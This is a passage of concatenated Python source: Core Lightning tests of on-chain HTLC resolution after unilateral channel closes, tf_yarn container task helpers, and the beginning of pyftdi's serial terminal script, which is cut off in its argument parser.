    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                           'OUR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                           'OUR_UNILATERAL/OUR_HTLC')

    # And three more for us to consider them all settled.
    bitcoind.generate_block(3)

    # Now, those nodes should have correctly failed the HTLCs
    # NOTE(review): this checks nodes 0..mid-2 only; nodes[mid - 1] is
    # skipped — presumably deliberate, but confirm against the HTLC CLTVs.
    for n in nodes[:mid - 1]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # Other timeouts are 27,27,28 blocks.
    bitcoind.generate_block(2)
    nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
    for _ in range(2):
        nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                                   'THEIR_UNILATERAL/OUR_HTLC')

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                               'THEIR_UNILATERAL/OUR_HTLC')

    # Depth 3 to consider it settled.
    bitcoind.generate_block(3)

    for n in nodes[mid + 1:]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # At depth 100 it's all done (we didn't bother waiting for mid+1's
    # spends, so that might still be going)
    bitcoind.generate_block(97)
    nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])

    # No other channels should have failed.
    for i in range(len(nodes) - 1):
        if i != mid:
            assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
    """Node pushes a channel onchain with multiple HTLCs with same payment_hash """
    h, nodes = setup_multihtlc_test(node_factory, bitcoind)

    mid = len(nodes) // 2

    for i in range(len(nodes) - 1):
        assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']

    # Now midnode+1 goes onchain with midnode channel.
    nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
    nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log(' to ONCHAIN')
    nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')

    # Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
    # In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
    nodes[0].restart()
    nodes[-1].restart()

    # We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
    nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
    nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)

    # Wait for HTLCs to stabilize.
    nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
    nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
    nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')

    # At depth 5, midnode+1 will spend its own to-self output.
    bitcoind.generate_block(4)
    # NOTE(review): unlike every other call site here, no output argument is
    # passed — presumably the helper then matches any output; confirm its
    # signature.
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')

    # The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
    bitcoind.generate_block(16)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                           'THEIR_UNILATERAL/OUR_HTLC')
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                           'THEIR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                           'THEIR_UNILATERAL/OUR_HTLC')

    # At depth 3 we consider them all settled.
    bitcoind.generate_block(3)

    # Now, those nodes should have correctly failed the HTLCs
    # NOTE(review): nodes[mid - 1] is skipped here — presumably deliberate,
    # mirroring test_onchain_multihtlc_our_unilateral; confirm.
    for n in nodes[:mid - 1]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # Other timeouts are at depths 27,27,28 blocks.
    bitcoind.generate_block(2)
    nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
    for _ in range(2):
        nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                                   'OUR_UNILATERAL/OUR_HTLC')

    bitcoind.generate_block(1)
    nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                               'OUR_UNILATERAL/OUR_HTLC')

    # At depth 3 we consider them all settled.
    bitcoind.generate_block(3)

    for n in nodes[mid + 1:]:
        with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
            n.rpc.waitsendpay(h, TIMEOUT)

    # At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
    bitcoind.generate_block(1)
    for _ in range(2):
        nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                                   'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')

    bitcoind.generate_block(1)
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                               'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')

    # At depth 100 they're all done.
    bitcoind.generate_block(100)
    nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
    nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])

    # No other channels should have failed.
    for i in range(len(nodes) - 1):
        if i != mid:
            assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
    """Unilateral close with an unsettled *incoming* HTLC on l2.

    l2 drops to chain right before sending update_fulfill_htlc; onchaind
    must then claim the HTLC with the preimage via OUR_HTLC_SUCCESS_TX and
    sweep the delayed output back to the wallet after the CSV delay.
    """
    # Test case where we fail with unsettled incoming HTLC.
    disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=disconnects)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    # This will fail at l2's end.
    t = executor.submit(l1.pay, l2, 200000000)
    l2.daemon.wait_for_log('dev_disconnect permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Their unilateral tx, old commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')

    # l2 then gets preimage, uses it instead of ignoring
    l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
                                   'OUR_UNILATERAL/THEIR_HTLC')
    bitcoind.generate_block(1)

    # OK, l1 sees l2 fulfill htlc.
    l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
    l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
    bitcoind.generate_block(5)

    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
    t.cancel()

    # Now, 100 blocks it should be done.
    bitcoind.generate_block(95)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    # l2's sweep confirmed later, so it needs 5 more blocks than l1.
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(5)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
    """Unilateral close with an unsettled *outgoing* HTLC on l2.

    l2 drops to chain right after sending revoke_and_ack; l1 then fulfills
    the HTLC on-chain with the preimage, and l2 sweeps its delayed output.
    """
    # Test case where we fail with unsettled outgoing HTLC.
    disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
    l1 = node_factory.get_node(options={'dev-no-reconnect': None})
    # Feerates identical so we don't get gratuitous commit to update them
    l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l2.daemon.wait_for_log('openingd-{} chan #1: Handed peer, entering loop'.format(l1.info['id']))
    l2.fund_channel(l1, 10**6)

    # This will fail at l2's end.
    t = executor.submit(l2.pay, l1, 200000000)
    l2.daemon.wait_for_log('dev_disconnect permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Their unilateral tx, old commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_logs([
        'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
        'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
    ])

    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')

    # l1 then gets preimage, uses it instead of ignoring
    l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
                                   'THEIR_UNILATERAL/THEIR_HTLC')

    # l2 sees l1 fulfill tx.
    bitcoind.generate_block(1)

    l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
    t.cancel()

    # l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
    bitcoind.generate_block(3)
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # Now, 100 blocks they should be done.
    bitcoind.generate_block(95)
    sync_blockheight(bitcoind, [l1, l2])
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    sync_blockheight(bitcoind, [l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(3)
    sync_blockheight(bitcoind, [l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    # l2 waits until its sweep is buried deep enough before forgetting.
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
    """Full unilateral-close lifecycle via dev_fail.

    Checks billboard status strings on both sides, confirmation of the close
    tx in listfunds (including across a restart), the delayed-output sweep,
    and that both nodes eventually forget the channel.
    """
    l1, l2 = node_factory.line_graph(2)

    # The funding change should be confirmed and our only output
    assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
    l1.pay(l2, 200000000)

    # Make sure l2 has received sig with 0 htlcs!
    l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
    l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')

    # Make sure l1 has final revocation.
    l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
    l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # We fail l2, so l1 will reconnect to it.
    l2.rpc.dev_fail(l1.info['id'])
    l2.daemon.wait_for_log('Failing due to dev-fail command')
    l2.wait_for_channel_onchain(l1.info['id'])

    assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1

    # Now grab the close transaction
    closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))

    # l2 will send out tx (l1 considers it a transient error)
    bitcoind.generate_block(1)

    l1.daemon.wait_for_log('Their unilateral tx, old commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')

    wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
             == ['ONCHAIN:Tracking their unilateral close',
                 'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])

    def check_billboard():
        # l2's side: its own unilateral close with one unresolved output.
        billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
        return (
            len(billboard) == 2
            and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
            and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
        )
    wait_for(check_billboard)

    # Now, mine 4 blocks so it sends out the spending tx.
    bitcoind.generate_block(4)

    # onchaind notes to-local payment immediately.
    assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])

    # Restart, should still be confirmed (fails: unwinding blocks erases
    # the confirmation, and we don't re-make it).
    l1.restart()
    wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))

    # It should send the to-wallet tx.
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # 100 after l1 sees tx, it should be done.
    bitcoind.generate_block(95)
    wait_for(lambda: l1.rpc.listpeers()['peers'] == [])

    wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
        'ONCHAIN:Tracking our own unilateral close',
        'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
    ])

    # Now, 100 blocks l2 should be done.
    bitcoind.generate_block(5)
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])

    # Only l1 has a direct output since all of l2's outputs are respent (it
    # failed). Also the output should now be listed as confirmed since we
    # generated some more blocks.
    assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])

    # Check that the all the addresses match what we generated ourselves:
    for o in l1.rpc.listfunds()['outputs']:
        txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
        addr = txout['scriptPubKey']['addresses'][0]
        assert(addr == o['address'])

    addr = l1.bitcoin.rpc.getnewaddress()
    l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
    """Stop a node via RPC, checking for memory leaks first.

    The leak check is skipped under valgrind, which does its own tracking.
    """
    # Fail, in that it will exit before cleanup.
    l1 = node_factory.get_node(may_fail=True)
    if not VALGRIND:
        leaks = l1.rpc.dev_memleak()['leaks']
        if len(leaks):
            raise Exception("Node {} has memory leaks: {}"
                            .format(l1.daemon.lightning_dir, leaks))
    l1.rpc.stop()
|
_task_commons.py | import json
import logging
import os
import re
import sys
from typing import List, Tuple, Dict, Optional
import cloudpickle
import skein
import tensorflow as tf
from tf_yarn import event, cluster, Experiment, constants
from tf_yarn._internal import MonitoredThread, iter_tasks
_logger = logging.getLogger(__name__)
def _log_sys_info() -> None:
    """Log the interpreter and key library versions for later debugging."""
    for banner in (
            f"Python {sys.version}",
            f"Skein {skein.__version__}",
            f"TensorFlow {tf.version.GIT_VERSION} {tf.version.VERSION}"):
        _logger.info(banner)
def _setup_container_logs(client):
    """Publish this container's YARN log URL through the skein event helpers."""
    task = cluster.get_task()
    event.broadcast_container_start_time(client, task)
    # Locate our own container record by matching the YARN container id
    # injected into the environment by the NodeManager.
    container = next(c for c in client.get_containers()
                     if c.yarn_container_id == os.environ["CONTAINER_ID"])
    logs = container.yarn_container_logs
    # Log addresses may come back without a scheme; normalize to http://.
    if logs is not None and not logs.startswith("http://"):
        logs = "http://" + logs
    event.logs_event(client, task, logs)
def _prepare_container(
    host_port: Tuple[str, int]
) -> Tuple[skein.ApplicationClient, Dict[str, List[str]], List[str]]:
    """Keep socket open while preparing container.

    Registers with the skein application, publishes this container's logs,
    reads the task list from the KV store and assembles the cluster spec.
    Returns (client, cluster_spec, cluster_tasks).
    """
    client = skein.ApplicationClient.from_current()
    _setup_container_logs(client)
    cluster_tasks = _get_cluster_tasks(client)
    cluster_spec = cluster.start_cluster(host_port, client, cluster_tasks)
    return client, cluster_spec, cluster_tasks
def _get_cluster_tasks(
    client: skein.ApplicationClient
) -> List[str]:
    """Read the cluster instance spec from the skein KV store and expand it
    into the flat list of task names."""
    raw_instances = client.kv.wait(constants.KV_CLUSTER_INSTANCES)
    instances = json.loads(raw_instances.decode())
    return list(iter_tasks(instances))
def _get_experiment(
    client: skein.ApplicationClient
) -> Experiment:
    """Unpickle and invoke the user-provided experiment factory.

    On failure, emits start/stop events (so the driver observes the error)
    before re-raising the original exception.
    """
    try:
        # KV_EXPERIMENT_FN holds a cloudpickled zero-arg factory function.
        experiment = cloudpickle.loads(client.kv.wait(constants.KV_EXPERIMENT_FN))()
    except Exception as e:
        task = cluster.get_task()
        event.start_event(client, task)
        event.stop_event(client, task, e)
        raise
    return experiment
def _gen_monitored_train_and_evaluate(client: skein.ApplicationClient):
    """Return a ``train_and_evaluate`` wrapper that broadcasts start/stop
    timing events around the actual TensorFlow call."""
    task = cluster.get_task()

    def train_and_evaluate(
            estimator: tf.estimator,
            train_spec: tf.estimator.TrainSpec,
            eval_spec: tf.estimator.EvalSpec):
        event.broadcast_train_eval_start_timer(client, task)
        tf.estimator.train_and_evaluate(
            estimator,
            train_spec,
            eval_spec
        )
        event.broadcast_train_eval_stop_timer(client, task)

    return train_and_evaluate
def _execute_dispatched_function(
    client: skein.ApplicationClient,
    experiment: Experiment
) -> MonitoredThread:
    """Run the experiment's train-and-evaluate loop on a monitored daemon
    thread and broadcast this task's start event.

    Returns the started MonitoredThread; callers inspect ``.exception``
    later (see ``_shutdown_container``).
    """
    task_type, task_id = cluster.get_task_description()
    _logger.info(f"Starting execution {task_type}:{task_id}")
    thread = MonitoredThread(
        name=f"{task_type}:{task_id}",
        target=_gen_monitored_train_and_evaluate(client),
        # Experiment unpacks to the wrapper's (estimator, train_spec, eval_spec).
        args=tuple(experiment),
        daemon=True)
    thread.start()
    task = cluster.get_task()
    event.start_event(client, task)
    return thread
def matches_device_filters(task: str, device_filters: List[str]):
    """Return True iff ``task`` ("type:id") is selected by ``device_filters``.

    An empty filter list matches every task. "/job:<type>" matches all tasks
    of that type; "/job:<type>/task:<id>" matches a single task. "master" is
    treated as an alias of "chief".
    """
    task_type, task_id = task.split(":", 1)
    if not device_filters:
        return True
    for spec in device_filters:
        # Remove once https://github.com/tensorflow/tensorflow/pull/22566 is released
        normalized = spec.replace("master", "chief")
        [(filter_type, filter_id)] = re.findall(
            r"^/job:([a-z]+)(?:/task:(\d+))?$", normalized)
        if filter_type == task_type and (not filter_id or filter_id == task_id):
            return True
    return False
def wait_for_connected_tasks(client, all_tasks, device_filters, message='stop'):
    """Block until every task selected by ``device_filters`` has posted its
    ``<task>/<message>`` event (by default, its "stop" event)."""
    for task in all_tasks:
        if matches_device_filters(task, device_filters):
            event.wait(client, f"{task}/{message}")
def _shutdown_container(
    client: skein.ApplicationClient,
    cluster_tasks: List[str],
    run_config: tf.estimator.RunConfig,
    thread: Optional[MonitoredThread]
) -> None:
    """Broadcast this task's stop event, wait for connected peers, then
    re-raise any exception captured by the monitored execution thread."""
    # Wait for all tasks connected to this one. The set of tasks to
    # wait for contains all tasks in the cluster, or the ones
    # matching ``device_filters`` if set. The implementation assumes
    # that ``device_filters`` are symmetric.
    exception = thread.exception if thread is not None and isinstance(thread, MonitoredThread) \
        else None
    task = cluster.get_task()
    event.stop_event(client, task, exception)
    wait_for_connected_tasks(
        client,
        cluster_tasks,
        getattr(run_config.session_config, "device_filters", []))
    event.broadcast_container_stop_time(client, task)
    if exception is not None:
        # Surface the training failure; `from None` drops the re-raise context.
        raise exception from None
|
pyterm.py | #!/usr/bin/env python3
"""Simple Python serial terminal
"""
# Copyright (c) 2010-2020, Emmanuel Blot <emmanuel.blot@free.fr>
# Copyright (c) 2016, Emmanuel Bouaziz <ebouaziz@free.fr>
# All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#pylint: disable-msg=too-many-instance-attributes
#pylint: disable-msg=too-many-arguments
#pylint: disable-msg=too-many-nested-blocks
#pylint: disable-msg=too-many-branches
#pylint: disable-msg=too-many-statements
#pylint: disable-msg=too-few-public-methods
#pylint: disable-msg=broad-except
#pylint: disable-msg=wrong-import-position
from argparse import ArgumentParser, FileType
from atexit import register
from collections import deque
from logging import Formatter, StreamHandler, DEBUG, ERROR
from os import environ, linesep, stat
from sys import exit as sysexit, modules, platform, stderr, stdout
from time import sleep
from threading import Event, Thread
from traceback import format_exc
from _thread import interrupt_main
#pylint: disable-msg=import-error
#pylint: disable-msg=import-outside-toplevel
from pyftdi import FtdiLogger
from pyftdi.ftdi import Ftdi
from pyftdi.misc import to_bps, add_custom_devices
from pyftdi.term import Terminal
class MiniTerm:
    """A mini serial terminal to demonstrate pyserial extensions"""

    DEFAULT_BAUDRATE = 115200

    def __init__(self, device, baudrate=None, parity=None, rtscts=False,
                 debug=False):
        self._terminal = Terminal()
        self._device = device
        self._baudrate = baudrate or self.DEFAULT_BAUDRATE
        self._port = self._open_port(self._device, self._baudrate, parity,
                                     rtscts, debug)
        self._resume = False
        self._silent = False
        self._rxq = deque()
        self._rxe = Event()
        self._debug = debug
        register(self._cleanup)

    def run(self, fullmode=False, loopback=False, silent=False,
            localecho=False, autocr=False):
        """Switch to a pure serial terminal application"""
        self._terminal.init(fullmode)
        print('Entering minicom mode @ %d bps' % self._port.baudrate)
        stdout.flush()
        self._resume = True
        # start the reader (target to host direction) within a dedicated thread
        args = [loopback]
        if self._device.startswith('ftdi://'):
            # with pyftdi/pyusb/libusb stack, there is no kernel buffering
            # which means that a UART source with data burst may overflow the
            # FTDI HW buffer while the SW stack is dealing with formatting
            # and console output. Use an intermediate thread to pop out data
            # out from the HW as soon as it is made available, and use a deque
            # to serve the actual reader thread
            args.append(self._get_from_source)
            # FIX: Thread.setDaemon() is deprecated since Python 3.10 and
            # removed in 3.13; pass daemon=True to the constructor instead.
            sourcer = Thread(target=self._sourcer, daemon=True)
            sourcer.start()
        else:
            # regular kernel buffered device
            args.append(self._get_from_port)
        reader = Thread(target=self._reader, args=tuple(args), daemon=True)
        reader.start()
        # start the writer (host to target direction)
        self._writer(fullmode, silent, localecho, autocr)

    def _sourcer(self):
        """Drain the HW port as fast as possible into the RX deque (FTDI path)."""
        try:
            while self._resume:
                data = self._port.read(4096)
                if not data:
                    continue
                self._rxq.append(data)
                self._rxe.set()
        except Exception as ex:
            self._resume = False
            print(str(ex), file=stderr)
            interrupt_main()

    def _get_from_source(self):
        """Pop pending RX data from the deque, waiting up to 100 ms for it."""
        while not self._rxq and self._resume:
            if self._rxe.wait(0.1):
                self._rxe.clear()
                break
        if not self._rxq:
            return bytearray()
        return self._rxq.popleft()

    def _get_from_port(self):
        """Read RX data straight from the kernel-buffered serial port."""
        try:
            return self._port.read(4096)
        except OSError as ex:
            self._resume = False
            print(str(ex), file=stderr)
            interrupt_main()
        except Exception as ex:
            print(str(ex), file=stderr)
            return bytearray()

    def _reader(self, loopback, getfunc):
        """Loop forever, processing received serial data in terminal mode"""
        try:
            # Try to read as many bytes as possible at once, and use a short
            # timeout to avoid blocking for more data
            self._port.timeout = 0.050
            while self._resume:
                if self._silent:
                    sleep(0.25)
                    continue
                data = getfunc()
                if data:
                    stdout.write(data.decode('utf8', errors='replace'))
                    stdout.flush()
                if loopback:
                    self._port.write(data)
        except KeyboardInterrupt:
            return
        except Exception as exc:
            print("Exception: %s" % exc)
            if self._debug:
                print(format_exc(chain=False), file=stderr)
            interrupt_main()

    def _writer(self, fullmode, silent, localecho, crlf=0):
        """Loop and copy console->serial until EOF character is found"""
        while self._resume:
            try:
                char = self._terminal.getkey()
                if fullmode and ord(char) == 0x2:    # Ctrl+B
                    self._cleanup(True)
                    return
                if self._terminal.IS_MSWIN:
                    # MS Windows: translate extended keys, handle Ctrl+C here.
                    if ord(char) in (0, 224):
                        char = self._terminal.getkey()
                        self._port.write(self._terminal.getch_to_escape(char))
                        continue
                    if ord(char) == 0x3:    # Ctrl+C
                        raise KeyboardInterrupt('Ctrl-C break')
                if silent:
                    if ord(char) == 0x6:    # Ctrl+F
                        self._silent = True
                        print('Silent\n')
                        continue
                    if ord(char) == 0x7:    # Ctrl+G
                        self._silent = False
                        print('Reg\n')
                        continue
                if localecho:
                    stdout.write(char.decode('utf8', errors='replace'))
                    stdout.flush()
                if crlf:
                    if char == b'\n':
                        self._port.write(b'\r')
                        if crlf > 1:
                            # Replace LF with CR rather than prefixing it.
                            continue
                self._port.write(char)
            except KeyError:
                continue
            except KeyboardInterrupt:
                if fullmode:
                    if self._terminal.IS_MSWIN:
                        self._port.write(b'\x03')
                        continue
                self._cleanup(True)

    def _cleanup(self, *args):
        """Cleanup resource before exiting"""
        if args and args[0]:
            print('%sAborting...' % linesep)
        try:
            self._resume = False
            if self._port:
                # wait till the other thread completes
                sleep(0.5)
                try:
                    rem = self._port.inWaiting()
                except IOError:
                    # maybe a bug in underlying wrapper...
                    rem = 0
                # consumes all the received bytes
                for _ in range(rem):
                    self._port.read()
                self._port.close()
                self._port = None
                print('Bye.')
        except Exception as ex:
            print(str(ex), file=stderr)
        finally:
            if self._terminal:
                self._terminal.reset()
                self._terminal = None

    @staticmethod
    def _open_port(device, baudrate, parity, rtscts, debug=False):
        """Open the serial communication port"""
        try:
            from serial.serialutil import SerialException
            from serial import PARITY_NONE
        except ImportError as exc:
            raise ImportError("Python serial module not installed") from exc
        try:
            from serial import serial_for_url, VERSION as serialver
            version = tuple([int(x) for x in serialver.split('.')])
            if version < (3, 0):
                raise ValueError
        except (ValueError, IndexError, ImportError) as exc:
            raise ImportError("pyserial 3.0+ is required") from exc
        # the following import enables serial protocol extensions
        if device.startswith('ftdi:'):
            try:
                from pyftdi import serialext
                serialext.touch()
            except ImportError as exc:
                raise ImportError("PyFTDI module not installed") from exc
        try:
            port = serial_for_url(device,
                                  baudrate=baudrate,
                                  parity=parity or PARITY_NONE,
                                  rtscts=rtscts,
                                  timeout=0)
            if not port.is_open:
                port.open()
            if not port.is_open:
                raise IOError('Cannot open port "%s"' % device)
            if debug:
                backend = port.BACKEND if hasattr(port, 'BACKEND') else '?'
                print("Using serial backend '%s'" % backend)
            return port
        except SerialException as exc:
            raise IOError(str(exc)) from exc
def get_default_device() -> str:
    """Return the default comm device, depending on the host/OS."""
    env_override = environ.get('FTDI_DEVICE', '')
    if env_override:
        return env_override
    # Pick the conventional serial device name for this platform.
    platform_defaults = {
        'win32': 'COM1',
        'darwin': '/dev/cu.usbserial',
        'linux': '/dev/ttyS0',
    }
    device = platform_defaults.get(platform, '')
    # Fall back to the first FTDI device when the candidate does not exist.
    try:
        stat(device)
    except OSError:
        device = 'ftdi:///1'
    return device
def main():
    """Main routine: parse CLI arguments, configure logging, run MiniTerm."""
    debug = False
    try:
        default_device = get_default_device()
        argparser = ArgumentParser(description=modules[__name__].__doc__)
        argparser.add_argument('-f', '--fullmode', dest='fullmode',
                               action='store_true',
                               help='use full terminal mode, exit with '
                                    '[Ctrl]+B')
        argparser.add_argument('device', nargs='?', default=default_device,
                               help='serial port device name (default: %s)' %
                               default_device)
        argparser.add_argument('-b', '--baudrate',
                               help='serial port baudrate (default: %d)' %
                               MiniTerm.DEFAULT_BAUDRATE,
                               default='%s' % MiniTerm.DEFAULT_BAUDRATE)
        argparser.add_argument('-w', '--hwflow',
                               action='store_true',
                               help='hardware flow control')
        argparser.add_argument('-e', '--localecho',
                               action='store_true',
                               help='local echo mode (print all typed chars)')
        argparser.add_argument('-r', '--crlf',
                               action='count', default=0,
